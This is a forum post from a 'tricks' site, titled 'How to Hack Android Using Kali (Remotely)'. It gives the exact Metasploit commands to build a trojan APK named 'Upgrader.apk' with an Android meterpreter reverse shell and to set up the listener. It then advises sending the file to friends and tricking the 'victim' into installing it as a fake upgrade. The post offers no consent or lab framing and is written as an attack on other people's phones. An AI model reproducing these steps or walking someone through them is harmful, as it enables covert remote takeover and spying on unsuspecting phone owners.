Hello There, Guest!

l Register
Current time: 05-17-2024, 05:21 PM
facebook twitter youtube google+ feedburner
  • http://tricksduniya.com
  • Welcome the world of CRYPTO CURRENCY
  • visit daily
  • For Whatsapp Official Group Contact Our Modrate
  • Mr. Paramjit Singh = 08295205000
  • Mr. Mack = 08295943112


Tricks Duniya -ONLINE SHOPPING GUIDE, MOBILE TRICKS, ANDROID TRICKS, HACKING > MOBILE ZONE > ANDROID HACKING > How to Hack Android Using Kali (Remotely) >

 Replies: 0    views: 672
Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 How to Hack Android Using Kali (Remotely)
Download App
03-01-2015, 04:30 PM,
Offline
Administrator
Joined: Nov 2014
Mesajlar : 609
Konular:
Rep Puanı: 7

Points: 0₹
Points: 0₹
#1
How to Hack Android Using Kali (Remotely)

How to Hack Android Using Kali (Remotely)

This is a tutorial explaining how to hack android phones with Kali.
I can't see any tutorials explaining this Hack/Exploit, so, I made one.
(Still ,you may already know about this)
Step 1: Fire-Up Kali:

 [Image: attachment.php?aid=943]   

*Open a terminal, and make a Trojan .apk
*You can do this by typing :
*msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)



*You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)




Step 2: Open Another Terminal:

 [Image: attachment.php?aid=944]   

*Open another terminal until the file is being produced.
*Load metasploit console, by typing : msfconsole


 [Image: attachment.php?aid=945]   

Step 3: Set-Up a Listener:

*After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler


*Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
*To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

 [Image: attachment.php?aid=946]   

Step 4: Exploit!

*At last type: exploit to start the listener.
*Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.



*Then send it using Uploading it to Dropbox or any sharing website (like: http://www.speedyshare.com).
*Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)


 [Image: attachment.php?aid=947]   

*Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
*However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
*And when he clicks Open...

Step 5: BOOM!

There comes the meterpreter prompt:

 [Image: attachment.php?aid=948]   

The END:

Keep coming for more!

Possibly Related Threads…
[Exclusive By SAVAN] How To Hack WhatsApp In 5 Minutes


admin signature
                                Heart TricksDuniya.com Heart
                    keep Visiting TricksDuniya
              Don't Forgot to Register Yourself!



03-01-2015, 04:30 PM
Reply
« Next Oldest | Next Newest »
Users browsing this thread: 1 Guest(s)



Possibly Related Threads…
Thread Author Replies Views Last Post
  [Exclusive By SAVAN] How To Hack WhatsApp In 5 Minutes Savan 14 2,978 12-01-2015, 09:45 AM
Last Post: Savan
  How To Block Ads On Youtube In Rooted Android Avishkar Singh 0 478 11-28-2015, 09:32 AM
Last Post: Avishkar Singh
  How To Install Kali Linux On Any Rooted Android Avishkar Singh 6 1,127 11-28-2015, 08:59 AM
Last Post: Avishkar Singh

Forum Jump:

Powered By Mack Doun
© 2015-2024 Paramjit Singh.
TricksDuniya theme TricksDuniya © 2015.